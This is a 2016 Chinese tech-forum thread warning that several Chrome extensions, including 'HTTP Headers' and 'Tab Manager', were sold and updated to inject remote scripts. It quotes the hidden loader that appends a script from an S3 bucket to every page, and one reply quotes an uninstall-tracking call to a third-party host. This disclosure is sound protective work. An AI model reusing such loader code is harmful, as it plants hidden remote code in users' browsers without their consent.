Home Sign Up Sign In
shiji

关于 Chrome 插件的安全问题

  •  1      
  •   shiji · Nov 1, 2016 · 5678 views
    This topic created in 3500 days ago, the information mentioned may be changed or developed.

    今天用 Chrome 分析网络的时候发现了个 403 状态的“ http_headers_1.js ”最近总是看见。 问题是我访问的是自己的网站,里面没有加载任何 js ,就是个百分百的纯文字页。

    后来问题查到了 Chrome 扩展上:

    https://chrome.google.com/webstore/detail/http-headers/mhbpoeinkhpajikalhfpjjafpfgjnmgk/reviews

    这个叫 Http Header 是我经常使用的一个插件

    插件里面有这么一句:

    (() => {
var s = document.createElement('script');
s.src = '//s3.eu-central-1.amazonaws.com/forton/http_headers_1.js';
document.body.appendChild(s);})();

    目前来说我只见到了 403 状态码。 然后当我卸载了它重新安装的时候。发现这句话不见了:

    (() => {
    if (!chrome.contextMenus) {
    return void console.log("Chrome contextMenus access failed"); // http_headers_1
}

    但是这个注释也蛮有意思。

    针对这个 S3 域名加部分路径搜索,发现了这个:

    https://www.reddit.com/r/chrome/comments/4uawrf/fyi_tab_manager_extensions_new_owners_have_added/

    https://www.reddit.com/r/help/comments/4tquap/hitting_collapse_comment_icon_button_is/

    插入的 js 路径:

    https://s3.eu-central-1.amazonaws.com/forton/tab_manager.js

    只是文件名不一样了。而且这个 js 是可访问的,不会 403 。说简单点功能就是插广告,引流返利之类的东西。

    这些插件作者不同,但是都是近期被别的公司买了。

    我觉得 Chrome 应该可以设置禁止插件自动更新,尤其是插件发生了权限变更的时候,谷歌提示要么更新要么删除,有点变态。

    更多类似感染的插件:

    Live HTTP Headers:

    https://chrome.google.com/webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo/reviews?hl=en-US

    HTTP Headers:

    https://chrome.google.com/webstore/detail/http-headers/mhbpoeinkhpajikalhfpjjafpfgjnmgk/reviews

    Tab Manage:

    https://chrome.google.com/webstore/detail/tab-manager/coonecdghnepgiblpccbbihiahajndda/reviews?hl=en&gl=US

    以上几个估计背后的人是一伙的。

    还有这个,我很早就发现问题了,安装的时候会偷偷下载另外一个扩展安装上:

    Change HTTP Request Header

    https://chrome.google.com/webstore/detail/change-http-request-heade/ppmibgfeefcglejjlpeihfdimbkfbbnm/reviews?hl=en-US

  • 插件
  • Chrome
  • 路径
  • void
    8 replies    2016-11-15 21:34:54 +08:00
    cname
        1
    cname  
       Nov 1, 2016 via Android
    现在就用一些必要的扩展,其余都删了
    redsonic
        2
    redsonic  
       Nov 1, 2016
    google 是不是不允许插件代码混淆,如果是我就混淆一下,既然已经耍流氓了。
    honeycomb
        3
    honeycomb  
       Nov 1, 2016 via Android
    Google 自己写了一个扩展可以用来监控所有扩展的动作
    shiji
        4
    shiji  
    OP
       Nov 1, 2016
    @honeycomb 我刚刚找了找,没找到。求名字
    idler
        5
    idler  
       Nov 1, 2016   ❤️ 3
    @shiji Chrome Apps & Extensions Developer Tool

    https://chrome.google.com/webstore/detail/chrome-apps-extensions-de/ohmmkhmmmpcnpikjeljgnaoabkaalbgc
    AlphaTr
        6
    AlphaTr  
       Nov 1, 2016
    除了大厂的差价,剩下的插件自己写
    danliuwo
        7
    danliuwo  
       Nov 1, 2016
    词霸快译 表示不服,在没有安装任何它的插件它也能搞 chrome, 我在收藏夹打开链接它会先弹出一个新窗口广告,你说屌不屌,别以为不安装插件就安全了
    ctsed
        8
    ctsed  
       Nov 15, 2016
    还有这个

    Inject jQuery 1.0.4
    Injects jQuery in the page.
    ID : indebdooekgjhkncmgbkeopjebofdoid

    chrome.runtime.setUninstallURL('http://extsgo.com/api/tracker/uninstall?ext_id=' + chrome.runtime.id);
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   1445 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 47ms · UTC 23:58 · PVG 07:58 · LAX 16:58 · JFK 19:58
    ♥ Do have faith in what you're doing.